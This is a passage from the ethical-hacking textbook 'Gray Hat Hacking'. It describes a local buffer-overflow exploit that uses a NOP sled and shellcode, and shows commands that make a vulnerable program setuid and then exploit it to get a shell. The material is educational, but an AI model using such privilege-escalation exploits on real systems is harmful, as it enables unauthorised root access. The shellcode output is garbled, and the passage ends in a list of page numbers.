Next a function is defined that will
return the current value of the esp register on the local system. The main function takes
up to three arguments, which optionally set the size of the overflowing buffer, the offset
of the buffer and esp, and the manual esp value for remote exploits. User directions are
printed to the screen followed by memory locations used. Next the malicious buffer is
built from scratch, filled with addresses, then NOPs, then shellcode. The buffer is
Gray Hat Hacking: The Ethical Hacker??™s Handbook
160
terminated with a NULL character. The buffer is then injected into the vulnerable local
program and printed to the screen (useful for remote exploits).
Let??™s try our new exploit on meet.c:
# gcc -o meet meet.c
# chmod u+s meet
# su joe
$ ./exploit 600
Usage: ./exploit
ESP:0xbffffbd8 Offset:0x0 Return:0xbffffbd8
Hello ?«^1??FF
??¦truncated for brevity??¦
??1?›??@????????????/bin/sh?????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»????
?»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»????
?»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»???????»??
sh-2.
Pages:
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333